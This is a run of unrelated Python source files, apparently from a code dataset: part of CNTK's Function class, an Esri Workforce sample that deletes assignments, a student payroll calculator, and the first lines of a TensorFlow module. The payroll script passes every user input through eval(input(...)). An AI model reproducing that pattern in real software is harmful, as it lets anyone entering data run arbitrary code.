>>> @C.Function # construct a primitive Function through @Function
... def g(x,y):
... return x+y
>>> print(g)
Plus(x: Sequence[tensor], y: Sequence[tensor]) -> Sequence[tensor]
>>> @C.Function # construct a composite through @Function
... def h(x,y):
... return C.exp(x+y)
>>> print(h)
Composite(x: Sequence[tensor], y: Sequence[tensor]) -> Sequence[tensor]
'''
f_name = self.name
op_name = self.op_name
if self.is_composite:
if self.root_function and all(i.uid == ri.uid for i, ri in zip(self.inputs, self.root_function.inputs)):
op_name = self.root_function.op_name
else:
op_name = 'Composite' # (real op_name is CompositeFunctionOpName)
else:
op_name = self.op_name
args = self.signature
def format_arg_spec(v, is_output=False):
s = v.name + ': ' if not is_output and v.name else '' # (suppress output names, since they duplicate the function name)
return s + str(v._type)
outputs = self.outputs
if len(outputs) > 1:
output_signature = 'Tuple[' + ', '.join(format_arg_spec(output, True) for output in outputs) + ']'
else:
output_signature = format_arg_spec(outputs[0], True)
if self.name:
f_name += ": "
return f_name + op_name + '(' + ", ".join([format_arg_spec(param) for param in args]) + ') -> ' + output_signature
@typemap
def replace_placeholders(self, substitutions):
'''
In-place replace specified placeholders in the Function graph with the
specified replacements in the map.
Args:
substitutions (dict): map from placeholder to variables
Returns:
:class:`Function`: itself
'''
substitutions = substitutions or {}
if not isinstance(substitutions, dict):
raise TypeError("Variable substitution map must be a dictionary")
return super(Function, self).replace_placeholders(substitutions)
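# Hedged sketch for replace_placeholders():
#
#   import cntk as C
#   p = C.placeholder(name='p')
#   f = C.sin(p)
#   x = C.input_variable(4)
#   f.replace_placeholders({p: x})   # in-place: f now consumes the real input x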
@typemap
def replace_placeholder(self, substitution):
'''
In-place replace the only placeholder in the function graph with the
specified substitution.
Args:
substitution (:class:`~cntk.variables.Variable`): the variable
that will replace the placeholder
Returns:
:class:`Function`: itself
:raises Exception: when the function has multiple placeholders.
'''
return super(Function, self).replace_placeholder(substitution)
@typemap
def find_all_with_name(self, name, depth=0):
'''
Returns a list of primitive functions with ``name`` in the graph
starting from this node. If you expect only one function to be
returned, use :func:`find_by_name`.
Example:
>>> a = C.input_variable(shape=1, name='i')
>>> b = C.input_variable(shape=1, name='i')
>>> c = C.plus(a, b, name='c')
>>> len(c.find_all_with_name('i'))
2
>>> c.find_all_with_name('z')
[]
Args:
name (str): names to look for
depth (int, default 0): how deep into the block hierarchy the DFS
algorithm should go into. Set to -1 for infinite depth.
Returns:
list of :class:`Function` objects matching ``name``
See also:
:func:`find_by_name`
'''
from cntk.logging import graph
return graph.find_all_with_name(self, name, depth)
# TODO have a better name for combine() in this case
@typemap
def find_by_name(self, name, depth=0):
'''
Returns a primitive function with ``name`` in the graph starting from
this node. Throws an exception if ``name`` occurs multiple times. If
you expect multiple functions to be returned, use
:func:`find_all_with_name`.
Example:
>>> a = C.input_variable(shape=1, name='a')
>>> b = C.input_variable(shape=1, name='b')
>>> c = C.plus(a, b, name='c')
>>> print(c.find_by_name('b').name)
b
>>> c.find_by_name('z') is None
True
If you need a full function out of it that can be evaluated, you
need to upcast it (currently done via combine):
>>> d = c * 5
>>> C.combine([d.find_by_name('c')]).eval({a:[[1]], b:[[2]]})
array([[ 3.]], dtype=float32)
Args:
name (str): names to look for
depth (int, default 0): how deep into the block hierarchy the DFS
algorithm should go into. Set to -1 for infinite depth.
Returns:
:class:`Function` object matching ``name``
See also:
:func:`find_all_with_name`
'''
from cntk.logging import graph
return graph.find_by_name(self, name, depth)
class _ProgressCollector(cntk_py.ProgressWriter):
'''
Internal helper for tracking loss and metric values for train() and test().
'''
# TODO: If this is of general interest, consider to move it to progress_print.py
def __init__(self, progress_writers=None, summary_period=None):
self.training_updates = []
self.training_summaries = []
self.test_summaries = []
coll_period = progress_writers[0].freq if (progress_writers and progress_writers[0]) else \
summary_period if summary_period is not None else \
sys.maxsize
super(Function._ProgressCollector, self).__init__(coll_period, 0, sys.maxsize, 0, sys.maxsize, 0)
self.__disown__()
def on_write_training_update(self, samples, updates, aggregate_loss, aggregate_metric):
aggregate_loss = aggregate_loss[1] - aggregate_loss[0]
aggregate_metric = aggregate_metric[1] - aggregate_metric[0]
samples = samples[1] - samples[0]
aggregate_loss /= (samples if samples != 0 else 1)
aggregate_metric /= (samples if samples != 0 else 1)
self.training_updates.append(Record(loss=aggregate_loss, metric=aggregate_metric, samples=samples))
def on_write_test_update(self, *args, **kwargs):
pass
def on_write_training_summary(self, samples, updates, summaries, aggregate_loss, aggregate_metric, elapsed_milliseconds):
aggregate_loss /= (samples if samples != 0 else 1)
aggregate_metric /= (samples if samples != 0 else 1)
self.training_summaries.append(Record(loss=aggregate_loss, metric=aggregate_metric, samples=samples))
def on_write_test_summary(self, samples, updates, summaries, aggregate_metric, elapsed_milliseconds):
aggregate_metric /= (samples if samples != 0 else 1)
self.test_summaries.append(Record(metric=aggregate_metric, samples=samples))
def write(self, *args, **kwargs):
pass
def train(self, minibatch_source,
minibatch_size=32, streams=None, model_inputs_to_streams=None, parameter_learners=[],
callbacks=[], progress_frequency=None, max_epochs=None, epoch_size=None, max_samples=None):
'''
Trains a model, given by its criterion function, using the specified training parameters and configs.
Different aspects of training such as data sources, checkpointing, cross validation, progress printing
can be configured using the corresponding config classes.
The input data can be specified as a data reader (:class:`~cntk.io.MinibatchSource`)
for large corpora; or directly as numpy/scipy arrays if the data is so small that it
is feasible to keep it all in RAM.
Data is processed in minibatches. The minibatch size defaults to 32, which is a choice that commonly works well.
However, for maximum efficiency, we recommend to experiment with minibatch sizes
and choose the largest that converges well and does not exceed the GPU RAM.
This is particularly important for distributed training, where
often, the minibatch size can be increased throughout the training, which reduces data bandwidth
and thus speeds up parallel training.
If input data is given through a data reader (as opposed to directly as a numpy/scipy array),
the user must also specify the epoch size. This is because data readers are used for
large corpora, and the traditional definition of epoch size as number of samples in the corpus
is not very relevant. Instead, epoch size in CNTK means the number of samples
between summary actions, such as printing training progress, adjusting the learning rate, and/or checkpointing the model.
The function returns an object that contains these members: `epoch_summaries` is a list that
contains the progression of epoch loss (`.loss`) and metric (`.metric`) values and the corresponding
number of labels (`.samples`) that they were averaged over. This is the same value that a progress printer would print as epoch
summaries. `updates` is a similar list with the more fine-grained minibatch updates.
If a `TestConfig` was specified, then `test_summary` is the metric and sample count on the specified test set
for the final model.
A number of callback mechanisms can optionally be specified as a list as `callbacks`.
CNTK has a fixed set of callback types, and only those types are allowed in the `callbacks` list:
An object of type :class:`~cntk.cntk_py.ProgressWriter` from :mod:`cntk.logging` is used for progress logging;
a :class:`~cntk.train.training_session.CheckpointConfig` configures the checkpointing mechanism, which
keeps copies of models at regular intervals and allows seamless restarting from the last checkpoint;
a :class:`~cntk.train.training_session.TestConfig` allows specifying a test set that is evaluated at the end of training;
and a :class:`~cntk.train.training_session.CrossValidationConfig` specifies a user callback that can be used to adjust learning
hyper-parameters or to signal that training should stop, optionally based on a separate cross-validation data set.
This is a convenience wrapper around :class:`cntk.train.trainer.Trainer` and :class:`cntk.train.training_session.TrainingSession`.
Args:
self: the criterion function of a model to be trained. This is either a single-valued function (the loss)
or a tuple-valued function (loss and metric).
minibatch_source (:class:`~cntk.io.MinibatchSource` or tuple of numpy/scripy arrays):
data source used for training. For large data, use a MinibatchSource. For small data, pass a tuple of numpy/scipy arrays.
The number of streams/arrays must match the number of arguments of `self`.
streams (tuple): (only if minibatch_source is a data reader) the streams of the minibatch_source in argument order.
Not to be given if minibatch_source is specified as numpy/scipy arrays rather than a data reader.
minibatch_size (int or :class:`~cntk.cntk_py.minibatch_size_schedule`, defaults to 32): minibatch size (or schedule) for training
epoch_size (int): in CNTK, epoch size means the number of samples between outputting summary information and/or checkpointing.
This must be specified unless the user directly passes numpy/scipy arrays for the `minibatch_source`.
max_epochs (int, defaults to 1): maximum number of epochs to train for; requires `epoch_size`
parameter_learners (list): list of learners from :mod:`cntk.learners`
callbacks (list): list of callback objects, which can be of type
:class:`~cntk.cntk_py.ProgressWriter` from :mod:`cntk.logging` (for logging),
:class:`~cntk.train.training_session.CheckpointConfig` (for check-pointing),
:class:`~cntk.train.training_session.TestConfig` (for automatic final evaluation on a test set), and
:class:`~cntk.train.training_session.CrossValidationConfig` (for cross-validation based training control).
Except for progress writers, at most one of each is allowed.
model_inputs_to_streams (dict): alternative to `streams`, specifying the mapping as a map from input variables to streams
max_samples (int): maximum number of samples used for training; mutually exclusive with `max_epochs`
progress_frequency (int): frequency in samples for aggregated progress printing. Defaults to `epoch_size` if given, or `None` otherwise
Example:
>>> # a simple logistic-regression model
>>> N = 250
>>> np.random.seed(0)
>>> Y = np.random.randint(size=N, low=0, high=2) # labels
>>> X = (np.random.randn(N, 2)+3) * (Y[:,None]+1) # data
>>> # Our model expects float32 features, and cross-entropy expects one-hot encoded labels.
>>> import scipy.sparse
>>> Y = scipy.sparse.csr_matrix((np.ones(N,np.float32), (range(N), Y)), shape=(N, 2))
>>> X = X.astype(np.float32)
>>> model = cntk.layers.Dense(2, activation=None) # model function
>>> import cntk.layers
>>> @cntk.Function.with_signature(cntk.layers.Tensor[2], cntk.layers.SparseTensor[2]) # criterion function
... def criterion(data, label_one_hot):
... z = model(data) # apply model. Computes a non-normalized log probability for every output class.
... return cntk.cross_entropy_with_softmax(z, label_one_hot)
>>> learner = cntk.sgd(model.parameters, cntk.learning_rate_schedule(0.1, cntk.UnitType.minibatch))
>>> progress = criterion.train((X, Y), minibatch_size=25, max_epochs=2, epoch_size=125, parameter_learners=[learner])
>>> print("%.2f" % progress.epoch_summaries[-1].loss) # get the final epoch's loss value
0.76
Returns:
An object `progress` with `progress.epoch_summaries` and `progress.updates` being the progressions of average loss, average metric, and number of labels
for epochs and updates (groups of minibatches), respectively. If a `TestConfig` was given, then `progress.test_summary`
includes the result (.metric and .samples)
'''
if minibatch_size is None:
raise ValueError("minibatch_size must not be None.")
elif isinstance(minibatch_size, int): # convert to a schedule
from ..train.training_session import minibatch_size_schedule
minibatch_size = minibatch_size_schedule(minibatch_size)
elif not isinstance(minibatch_size, cntk_py.minibatch_size_schedule):
raise ValueError('minibatch_size must be an int or the result of a call to the minibatch_size_schedule() function')
# max_samples
# Can be either directly specified as max_samples or indirectly as (max_epochs, epoch_size).
if max_samples is None:
# derive from (max_epochs, epoch_size)
if epoch_size is None:
from ..io import MinibatchSource, UserMinibatchSource
if isinstance(minibatch_source, (MinibatchSource, UserMinibatchSource)): # UserMinibatchSource derives from cntk_py.SwigMinibatchSource, not MinibatchSource, for director purposes
raise ValueError("epoch_size must be specified, unless max_samples is given or input is given as numpy/scipy arrays.")
first_input = _as_tuple(minibatch_source)[0]
try:
epoch_size = len(first_input)
except:
epoch_size = first_input.shape[0] # if input is csr_matrix
if max_epochs is None:
max_epochs = 1 # default to 1 epoch
max_samples = int(max_epochs * epoch_size) # (we allow fractional epochs so our testing system can run abbreviated tests)
elif max_epochs is not None:
raise ValueError("max_epochs and max_samples are mutually exclusive.")
# parse callbacks list into the 4 different parameters that training_session expects
from ..train.training_session import training_session, CheckpointConfig, CrossValidationConfig, TestConfig
from ..cntk_py import ProgressWriter
configs = Record(progress_writers=[], checkpoint_configs=[None], cv_configs=[None], test_configs=[None])
types_to_configs = {
ProgressWriter: configs.progress_writers,
CheckpointConfig: configs.checkpoint_configs,
CrossValidationConfig: configs.cv_configs,
TestConfig: configs.test_configs
}
for cb in callbacks: # separate the callbacks list into one of 4 separate types
for type, config in types_to_configs.items():
if isinstance(cb, type):
if isinstance(cb, cntk.cntk_py.ProgressWriter): # multiple progress writers are allowed
config.append(cb)
elif config[0]:
raise ValueError('only one callback of type ' + str(type) + ' is permitted')
else:
config[0] = cb
else:
ValueError('callbacks list can only contain objects of type ProgressWriter, CheckpointConfig, CrossValidationConfig, and TestConfig.')
# use a progress tracker to capture the loss, metric, and count values
if progress_frequency is None and epoch_size is not None: # if epoch size is given then default training summary frequency to it
progress_frequency = epoch_size
collector = Function._ProgressCollector(configs.progress_writers, progress_frequency // minibatch_size[0] if progress_frequency is not None else None)
# Trainer instance
from ..train.trainer import Trainer
trainer = Trainer(None, self, parameter_learners, progress_writers=configs.progress_writers + [collector])
# input map
if streams:
if model_inputs_to_streams:
raise ValueError("streams and model_inputs_to_streams are mutually exclusive.")
model_inputs_to_streams = self.argument_map(*streams)
# training session
ts = training_session(trainer, minibatch_source, minibatch_size, model_inputs_to_streams=model_inputs_to_streams,
progress_frequency=progress_frequency, max_samples=max_samples,
checkpoint_config=configs.checkpoint_configs[0], cv_config=configs.cv_configs[0], test_config=configs.test_configs[0])
ts.train()
res = Record(updates=collector.training_updates, epoch_summaries=collector.training_summaries) if len(collector.training_summaries) > 0 else \
Record(updates=[Record(loss=0, metric=0, samples=0)], epoch_summaries=[Record(loss=0, metric=0, samples=0)])
if configs.test_configs[0]:
res = res.updated_with(test_summary=collector.test_summaries[-1])
return res
def test(self, minibatch_source, minibatch_size=32, streams=None, model_inputs_to_streams=None, callbacks=None):
'''
Measures the performance of a model, given by its criterion function, in the form of
average metric value (or loss if model has only one output) on a set of data.
This is a convenience wrapper around :class:`cntk.eval.evaluator.Evaluator`.
Args:
minibatch_source (:class:`~cntk.io.MinibatchSource`): minibatch source for the test data
minibatch_size (:class:`~cntk.cntk_py.minibatch_size_schedule` or int): minibatch size for evaluation
streams (tuple): the streams of the minibatch_source in argument order
model_inputs_to_streams (dict): mapping between input variables and input streams
callbacks (progress writer or list of them): optionally, list of
progress writers from :mod:`cntk.logging` to automatically track training
progress.
Returns:
An object `test_summary` with `test_summary.metric` being the average metric, and `test_summary.samples` the number of labels in the test set.
'''
if minibatch_size is None:
raise ValueError("minibatch_size must not be None.")
# input map
if streams:
if model_inputs_to_streams:
raise ValueError("streams and model_inputs_to_streams are mutually exclusive.")
model_inputs_to_streams = self.argument_map(*streams)
# wrap the data if needed
from ..train.training_session import TrainingSession
minibatch_source, model_inputs_to_streams = TrainingSession._sanitize_minibatch_source(minibatch_source, model_inputs_to_streams, self, infinitely_repeat=False)
# use a progress tracker to capture the metric and count values
collector = Function._ProgressCollector()
# Evaluator instance
from ..eval.evaluator import Evaluator
outputs = self.outputs
output = outputs[0] if len(outputs) == 1 else outputs[1] # use metric if present, otherwise loss
# callbacks. Only ProgressWriter is allowed in test()
from ..cntk_py import ProgressWriter
if callbacks and any(not isinstance(cb, ProgressWriter) for cb in callbacks):
raise ValueError('callbacks list must only contain objects of type ProgressWriter')
progress_writers = callbacks or []
evaluator = Evaluator(output, progress_writers + [collector])
# evaluation loop
while True:
data = minibatch_source.next_minibatch(minibatch_size) # fetch minibatch
if not data:
break # until we hit the end
evaluator.test_minibatch({ input: data[si] for input, si in model_inputs_to_streams.items()})
evaluator.summarize_test_progress()
return collector.test_summaries[-1]
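# Hedged sketch for test(), reusing the kind of criterion built in train()'s example
# above; X_test and Y_test are hypothetical held-out numpy/scipy arrays:
#
#   summary = criterion.test((X_test, Y_test), minibatch_size=32)
#   print(summary.metric, summary.samples)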
@typemap
def save(self, filename):
'''
Save this function graph into a model file using protobuf-based
serialization.
Use distributed.Communicator.is_main() to gate your call to save()
in distributed environment.
Args:
filename (str): model path
'''
return super(Function, self).save(filename)
@typemap
def restore(self, filename):
'''
Restore the model's parameters (in-place) from a saved model file
Args:
filename (str): saved model path
Returns:
`None`: this method only has the side-effect of loading the model parameters from the file
'''
return super(Function, self).restore(filename)
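# Hedged save/restore sketch ('model.cntkmodel' is an arbitrary file name):
#
#   model.save('model.cntkmodel')                  # serialize graph and parameters
#   model.restore('model.cntkmodel')               # later: reload parameters in place
#   model2 = C.Function.load('model.cntkmodel')    # or rebuild the whole graph from the file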
@staticmethod
def register_udf_deserialize_callback(op_name, callback):
'''
Register a callback function to be invoked when deserializing a user-
defined function with the corresponding op name.
When loading a model, CNTK will try to automatically reconstruct any
(non-native) user-defined functions by invoking a static
:func:`~cntk.ops.functions.UserFunction.deserialize` method of the
corresponding UserFunction sub-class. This method allows overriding the
default UDF deserialization behavior by specifying a user-defined
function op name and the corresponding callback that should be invoked
instead of the ``deserialize`` method.
Args:
op_name (str): unique op name of the user-defined function.
callback (function): a function taking three arguments (a list of
inputs to the UserFunction, a string name, and a state dictionary
generated by the corresponding :func:`~cntk.ops.functions.UserFunction.serialize`
method) and returns an instance of the user-defined function.
'''
if op_name in Function._udf_callback_map:
raise ValueError("A callback for the UserFunction with op name {}"
" has already been registered.".format(op_name));
Function._udf_callback_map[op_name] = callback
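# Hedged sketch: route deserialization of a user-defined op to a custom factory.
# 'MyUserFunction' and 'MyUserOp' are hypothetical names.
#
#   def make_my_op(inputs, name, state):
#       return MyUserFunction(inputs, name=name)
#   Function.register_udf_deserialize_callback('MyUserOp', make_my_op)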
@staticmethod
@typemap
def load(model, device=None):
'''
Load the ``model``, that has been saved using :func:`~cntk.ops.functions.Function.save`.
Args:
model (str, bytes or bytearray): either a file path of a model file or a byte buffer
containing the binary representation of a model.
device (:class:`~cntk.device.DeviceDescriptor`, defaults to the current globally default device):
specifies the device to allocate the model on.
Returns:
root node
'''
if not device:
device = DeviceDescriptor.use_default_device()
is_buffer = is_byte_buffer(model)
is_file = False
if not is_buffer:
try:
is_file = path.exists(model)
except:
pass
if is_buffer:
return cntk_py.Function.load_from_buffer(model, device)
if is_file:
return cntk_py.Function.load(model, device)
raise ValueError('Cannot load a model that is neither a file nor a byte buffer.')
@staticmethod
def with_signature(*args, **kwargs):
'''
Decorator for defining a @Function with a given signature. Same as @Function followed by @Signature.
Example:
>>> from cntk.layers.typing import *
>>> @Function.with_signature(Tensor[13])
... def f(x):
... return x * x
>>> print(f)
ElementTimes(x: Tensor[13]) -> Tensor[13]
>>> # which is equivalent to this:
>>> @Function
... @Signature(Tensor[13])
... def f(x):
... return x * x
>>> print(f)
ElementTimes(x: Tensor[13]) -> Tensor[13]
'''
def decorator(f):
from cntk.layers.typing import Signature
f = Signature(*args, **kwargs)(f)
f = Function(f)
return f
return decorator
def BlockFunction(op_name, name):
'''
Decorator for defining a @Function as a BlockFunction. Same as @Function, but wrap the content into an :func:`~cntk.ops.as_block`.
'''
return lambda f: Function(f, make_block=True, op_name=op_name, name=name)
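# Hedged sketch for BlockFunction(): the wrapped computation shows up as a single
# primitive op named 'TimesTwo' when traversing the graph:
#
#   from cntk.ops.functions import BlockFunction
#   @BlockFunction('TimesTwo', 'double')
#   def double(x):
#       return 2 * x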
@typemap
def register_native_user_function(op_id, module_name, factory_method_name):
'''
Registers a native user-defined Function that can be subsequently instantiated
using the 'native_user_function' method.
Args:
op_id (str): Unique id of the native user-defined Function to register.
This id must be unique and an error will be reported if it matches
the 'op_id' specified for any other registered native user-defined Function.
module_name (str): Name of the module containing the factory method for creating
instances of the native user-defined Function being registered. This is typically
the name of a DLL/so which exports a factory method for creating instances of the
native user-defined Function.
factory_method_name (str): Name of the factory method for creating instances of the native
user-defined Function being registered. This method must be an exported method of the
specified module.
'''
return cntk_py.Function_register_native_user_function(op_id, module_name, factory_method_name)
@typemap
def native_user_function(op_id, operands, attributes=None, user_function_instance_name=''):
'''
Creates an instance of a user-defined Function previously registered using the
'register_native_user_function' method.
Args:
op_id (str): Id of the native user-defined Function to instantiate.
This must be the id that was used when registering the native user-function
with the 'register_native_user_function' method.
operands (list): input operands of the new instance of the native user-defined Function.
user_function_instance_name (str): Name of the instance of the created native
user-defined Function.
Returns:
:class:`~cntk.ops.functions.Function`
'''
if attributes is None:
attributes = {}
attributes = _py_dict_to_cntk_dict(attributes)
return cntk_py.Function_native_user_function(op_id, operands, attributes, user_function_instance_name)
@typemap
def load_model(model, device=None):
'''
Alias for :func:`~cntk.ops.functions.Function.load`.
'''
return Function.load(model, device)
class UserFunction(Function):
'''
Base class of all user extension functions.
If it has only one output, one can invoke Variable methods on it, which it
will relay to its only output.
Args:
inputs (list): inputs to this function
as_numpy (bool, optional): whether the data should be automatically
converted from and to NumPy. Defaults to True. Specifying this as
`False` passes the data as CNTK Value objects.
name (str): name of this function
'''
def __init__(self, inputs, as_numpy=True, name=''):
super(UserFunction, self).__init__(inputs, name)
self.set_native(False)
self.as_numpy = as_numpy
# Since the state will frequently not be used, we cache the None-state
# to speed up.
self._none_state = cntk_py.UserBackPropState.create(self, cpu(), None)
# Memory management for user defined functions has to be controlled by
# the C++ side. For more information:
# http://www.swig.org/Doc3.0/Python.html#Python_nn35
self.__disown__()
def _get_none_state(self, device=cpu()):
if self._none_state.device() != device:
self._none_state = cntk_py.UserBackPropState.create(self, device, None)
return self._none_state
def _forward(self, arguments, outputs, device=None, outputs_to_retain=None):
'''
        Computes the values of specified variables in ``outputs``, using values
provided in ``arguments`` that correspond to each input `Variable` of
the function whose ``is_input`` is `True`.
This function calls :func:`forward`, which is to be implemented by the
user.
Args:
arguments (tuple): Value objects of the Function's input
outputs (iterable): outputs to fetch values for.
device (:class:`~cntk.device.DeviceDescriptor`, default `None`): the device
descriptor that contains the type and id of the device on which the
computation is. If `None`, the default device is used.
Returns:
A BackPropState instance, which is used by :func:`backward`.
'''
if self.as_numpy:
inputs = self.inputs
arguments = tuple(_value_as_sequence_or_array(v, inputs[i]) for i, v in enumerate(arguments))
map_if_possible(outputs)
map_if_possible(outputs_to_retain)
args = arguments if len(arguments)>1 else arguments[0]
if len(outputs) <= 1:
state, result = self.forward(args, device, outputs_to_retain)
for k in outputs:
outputs[k] = result
else:
state = self.forward(args, outputs, device, outputs_to_retain)
if isinstance(state, cntk_py.BackPropState):
self._state_wrapped = False
else:
self._state_wrapped = True
if state is None:
state = self._get_none_state(device)
else:
state = cntk_py.UserBackPropState.create(self, device, state)
if self.as_numpy:
for k,v in outputs.items():
if v is None:
raise ValueError('not all outputs have been provided')
# FIXME: seq_starts
outputs[k] = sanitize_batch(k, v, None, device)
return state, outputs
def _backward(self, state, root_gradients, variables):
'''
Backpropagates supplied ``root_gradients`` for one or more of the output
variables of the Function, to calculate gradients with respect to
``variables``. Formally, multiplies the values of ``root_gradients`` by
the Jacobian of the Function and returns the subset of the output that
corresponds to ``variables``.
This function calls :func:`backward`, which is to be implemented by the
user.
Args:
state (BackPropState): state obtained from a previous call to the
func:`cntk.ops.Function.forward` method on this Function for the
computation that this gradient backpropagation corresponds to.
root_gradients (dict): the gradients that will be backpropagated
variables (set): a list of input variables with respect to which
the gradients have to be computed.
Returns:
dict: mapping of ``variables`` to NumPy arrays
'''
device = state.device()
if self.as_numpy:
map_if_possible(root_gradients)
for v in root_gradients:
if v.needs_gradient:
root_gradients[v] = _value_as_sequence_or_array(root_gradients[v], v)
if not isinstance(state, cntk_py.BackPropState):
raise ValueError('state must be of type BackPropState')
if self._state_wrapped:
state = cntk_py.UserBackPropState.data(state)
map_if_possible(variables)
if len(root_gradients) == 1:
for rg in root_gradients.values():
break
root_gradients = rg
if len(self.inputs) > 1:
self.backward(state, root_gradients, variables)
else:
result = self.backward(state, root_gradients)
for k in variables:
variables[k] = result
if self.as_numpy:
for k, v in variables.items():
if v is not None:
variables[k] = sanitize_batch(k, v, None, device)
def _infer_outputs(self, outputs):
outputs.extend(self.infer_outputs())
def infer_outputs(self):
'''
Returns a list of all output variables this user-defined function
outputs.
Output variables are created by
:meth:`~cntk.ops.output_variable`.
'''
raise NotImplementedError('infer_outputs has to be overwritten')
def clone(self, cloned_inputs):
'''
Creates a clone of this user-defined function.
It assumes that the constructor signature of the user's implementation
of the user function takes the inputs as individual arguments followed
by the operator name. If the signature is different, then this method
        needs to be overridden.
Args:
cloned_inputs: list of cloned inputs to the new user-defined
Function clone to be created.
Returns:
A cloned instance of this user-defined function.
'''
return self.__class__(*cloned_inputs, name=self.name)
def _serialize_impl(self):
dictionary = _serialize(self)
return _py_dict_to_cntk_dict(dictionary)
@staticmethod
def deserialize(inputs, name, state):
'''
A stub deserialize method for illustration purposes. User-defined functions
need to provide their own implementation in order for CNTK to be able to
reconstruct them when loading a model.
Args:
inputs (list): a list of inputs to the function
name (str): name of this function
state (dict): a state dictionary generated by the corresponding
:func:`~cntk.ops.functions.UserFunction.serialize` method.
Returns:
An instance of the user-defined function.
'''
raise NotImplementedError('a stub method for illustration purposes.')
@property
def op_name(self):
'''
Unique operation name of this user-defined function.
This property defaults to '<module>.<class>', but can be overridden.
'''
return self.__class__._op_name()
def serialize(self):
'''
Generates a dictionary that captures the state of this user-defined function.
This method must be overridden, if a user function has any state that needs
to be preserved in the model dictionary.
'''
return {}
@classmethod
def _op_name(cls):
return cls.__module__ + '.' + cls.__name__
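# Minimal sketch of a UserFunction subclass; the class name, the square operation and
# the use of cntk.ops.output_variable are illustrative assumptions, not part of this class:
#
#     class MySquare(UserFunction):
#         def __init__(self, arg, name='MySquare'):
#             super(MySquare, self).__init__([arg], name=name)
#
#         def forward(self, argument, device=None, outputs_to_retain=None):
#             return argument, argument * argument   # keep the input as state for backward
#
#         def backward(self, state, root_gradients):
#             return root_gradients * 2 * state      # d(x*x)/dx == 2*x
#
#         def infer_outputs(self):
#             return [output_variable(self.inputs[0].shape, self.inputs[0].dtype,
#                                     self.inputs[0].dynamic_axes)]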
|
the-stack_0_6164 | # -*- coding: UTF-8 -*-
"""
Copyright 2018 Esri
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
This sample deletes assignments from a workforce project based on the supplied query
"""
import argparse
import logging
import logging.handlers
import traceback
import sys
from arcgis.apps import workforce
from arcgis.gis import GIS
def main(arguments):
# initialize logging
formatter = logging.Formatter("[%(asctime)s] [%(filename)30s:%(lineno)4s - %(funcName)30s()]\
[%(threadName)5s] [%(name)10.10s] [%(levelname)8s] %(message)s")
# Grab the root logger
logger = logging.getLogger()
# Set the root logger logging level (DEBUG, INFO, WARNING, ERROR, CRITICAL)
logger.setLevel(logging.DEBUG)
# Create a handler to print to the console
sh = logging.StreamHandler(sys.stdout)
sh.setFormatter(formatter)
sh.setLevel(logging.INFO)
# Create a handler to log to the specified file
if arguments.log_file:
rh = logging.handlers.RotatingFileHandler(arguments.log_file, mode='a', maxBytes=10485760)
rh.setFormatter(formatter)
rh.setLevel(logging.DEBUG)
logger.addHandler(rh)
# Add the handlers to the root logger
logger.addHandler(sh)
# Create the GIS
logger.info("Authenticating...")
    # First step is to authenticate and get a valid token
gis = GIS(arguments.org_url,
username=arguments.username,
password=arguments.password,
verify_cert=not arguments.skip_ssl_verification)
# Get the project
item = gis.content.get(arguments.project_id)
project = workforce.Project(item)
# Call delete features on the layer
logger.info("Deleting assignments...")
project.assignments_layer.delete_features(where=arguments.where)
# Note: could also use the following if validation of assignments is important:
# project.assignments.batch_delete(project.assignments.search(where=arguments.where))
logger.info("Completed")
if __name__ == "__main__":
# Get all of the commandline arguments
    parser = argparse.ArgumentParser("Delete Assignments from Workforce Project")
parser.add_argument('-u', dest='username', help="The username to authenticate with", required=True)
parser.add_argument('-p', dest='password', help="The password to authenticate with", required=True)
parser.add_argument('-org', dest='org_url', help="The url of the org/portal to use", required=True)
# Parameters for workforce
parser.add_argument('-project-id', dest='project_id', help="The id of the project to delete assignments from",
required=True)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-where', dest='where', help="The where clause to use", default="1=1")
parser.add_argument('-log-file', dest="log_file", help="The file to log to")
    parser.add_argument('--skip-ssl-verification', dest='skip_ssl_verification', action='store_true',
                        help="Do not verify the SSL certificate of the server")
args = parser.parse_args()
try:
main(args)
except Exception as e:
logging.getLogger().critical("Exception detected, script exiting")
logging.getLogger().critical(e)
logging.getLogger().critical(traceback.format_exc().replace("\n", " | "))
|
the-stack_0_6165 | # Andrew Riker
# CS1400 - LW2 XL
# Assignment #04
# user enters name of employee
name = input("Enter employee's name: ")
# user enters number of hours worked in a week
numberOfHours = eval(input("Enter number of hours worked in a week: "))
# user enters hourly pay
payRate = eval(input("Enter hourly pay rate: "))
# user enters federal tax rate
federalTaxRate = eval(input("Enter federal tax withholding rate (ex. 0.12): "))
# user enters state tax rate
stateTaxRate = eval(input("Enter state tax withholding rate (ex. 0.06): "))
# get federal percentage
federalPercent = str(format(federalTaxRate, "2.1%"))
# get state percentage
statePercent = str(format(stateTaxRate, "1.1%"))
# calculate gross pay
grossPay = numberOfHours * payRate
# calculate federal withholding
federalWithhold = grossPay * federalTaxRate
# calculate state withholding
stateWithhold = grossPay * stateTaxRate
# total deductions
totalDeductions = stateWithhold + federalWithhold
# net pay
netPay = grossPay - totalDeductions
# spec for format
specString = ">30s"
specFloat = "10.2f"
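# e.g. format("Pay Rate: $", ">30s") right-aligns the label in a 30-character field,
# and format(12.5, "10.2f") yields '     12.50'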
# name + pay information
msg = "\n\t" + name.upper() + " pay information".upper()
# pay
msg += "\n" + str(format("Pay", ">25s"))
msg += "\n"
# hours worked
msg += format("Hours Worked: ", specString) + str(format(numberOfHours, "10.0f"))
msg += "\n"
# Pay rate
msg += format("Pay Rate: $", specString) + str(format(payRate, specFloat))
msg += "\n"
# gross pay
msg += format("Gross Pay: $", specString) + str(format(grossPay, specFloat))
msg += "\n"
# print Deductions
msg += "\n" + str(format("Deductions", ">25s"))
msg += "\n"
# Federal Withholding
msg += format("Federal Withholding (" + federalPercent + "): $", specString) + str(format(federalWithhold, specFloat))
msg += "\n"
# state withholding
msg += format("State Withholding (" + statePercent + "): $", specString) + str(format(stateWithhold, specFloat))
msg += "\n"
# Total deductions
msg += format("Total Deduction: $", specString) + str(format(totalDeductions, specFloat))
msg += "\n"
# net pay
msg += "\n"
msg += format("Net Pay: $", specString) + str(format(netPay, specFloat))
# print information
print(msg)
|
the-stack_0_6166 | # -*- coding: utf-8 -*-
# File: base.py
from abc import abstractmethod, ABCMeta
import tensorflow as tf
